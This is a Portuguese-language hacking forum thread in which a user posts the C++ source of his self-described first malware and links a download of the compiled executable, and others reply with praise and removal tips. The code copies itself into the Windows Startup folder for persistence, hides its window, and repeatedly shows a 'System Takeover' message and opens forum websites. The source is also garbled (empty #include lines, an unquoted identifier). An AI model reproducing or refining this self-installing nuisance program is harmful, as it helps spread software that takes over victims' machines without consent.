[Source] Malware by SHaDy (antigo)

[Shady]

Este aqui e meu primeiro malware. Na verdade, a primeira versao. Bem inofensiva, executei no meu sistema inumeras vezes (mesmo quando estava construindo e tava fazendo um monte de bagunca auhweiha).

 Sei la, se quiser voce pode executar e tentar tirar. Digo que eh bem facil, se voce sabe um minimo de seguranca no windows vai conseguir tirar em menos de 1 minuto... mesmo assim, se nao conseguir, http://rapidshare.de/files/13228541/w0rm.exe.html

 Nossa, tou ate com vergonha de postar esse codigo  mesmo assim vou por 3 travitchas xD

-------------------------------------------------------------------------------
#include
#include
#include


using namespace std;

int main()
{
CopyFile("w0rm.exe","C:\\Documents and Settings\\All Users\\Menu Iniciar\\Programas\\Inicializar\\soparaestudo.exe",1);
system("title SHaDy");

HWND shady = FindWindow(0,SHaDy);
ShowWindow(shady,false);


int g = 2;
while (g<4){
      MessageBox(0,"SHaDy","System Takeover =P", MB_OK);
      Sleep(180000);
      system("start http://www.darkers.com.br");
      Sleep(180000);
      system("start http://www.sinapse.plughackers.net");
      Sleep(180000);
     g--;
    }
}
----------------------------------------------------------------------------------------

[Anonymous]

Nossa shady, uma coisa que sempre me impressionou em você foi como você evoluia tão rápido nas linguagens, vejo que evoluiu muito também em c++, parabéns

[Anonymous]

Shady, seguinte mano, você poderia me passar o code para mim ver como que é?
Porque executar aqui no linux algo para windows é extremamente complicado =/

[Shady]

E, ele nao funcionaria no linux. Quanto ao codigo, Morte, vou pensar no caso, mas acho que posso confiar em voce.

[Anonymous]

E, ele nao funcionaria no linux. Quanto ao codigo, Morte, vou pensar no caso, mas acho que posso confiar em voce.

uidhshudias, ok shady, na paz =]
Caso me passe, agradecerei, caso não, entendo, confiar em alguém que num tem amizade a anos é complicado demais...

[Anonymous]

morte , observe o comportamento do programa e vc nem precisara ver o codigo fonte

[Anonymous]

morte , observe o comportamento do programa e vc nem precisara ver o codigo fonte

Observar como?
Num tenho windows para ver como é pow...

[rodweb]

morte , observe o comportamento do programa e vc nem precisara ver o codigo fonte

Observar como?
Num tenho windows para ver como é pow...

uhahuuhauhha essa foi boa

[Anonymous]

morte , observe o comportamento do programa e vc nem precisara ver o codigo fonte

Observar como?
Num tenho windows para ver como é pow...

uhahuuhauhha essa foi boa

Porque mano, num entendi esse certo sarcasmo...

[rodweb]

nada não 

pq ele disse pra vc observar o comportamento..mais no linux não ia dar né...

[Anonymous]

Hehehe, muito legal Shady. Pra mim também fica dificil de testar aqui, é uma pena.

Ah, pra quem se infectou, só excluir o arquivo w0rm.exe que foi criado na pasta Iniciar de All Users.

Amilly... :-*

[Anonymous]

aleluia o source.. agora intendi como vc altero o registro hauheiae

vlw

[Shady]

Essa versao nao altera o registro.

[bloodrain]

hahaha alterar registro ate eu que começei a estudar C hj sei que isso nao toca no registro
soh que pra mim pra utilizar o meio de auto-inicializaçao "inicializar" tinha que ser uma atalho!
pelomenos no windows xp professional fiz um teste a um tempo pondo um exe e nao pegou

[Shady]

?? era pra pegar sim... eu testei aqui inclusive.. o codigo funciona, so e ridiculamente facil de ser removido.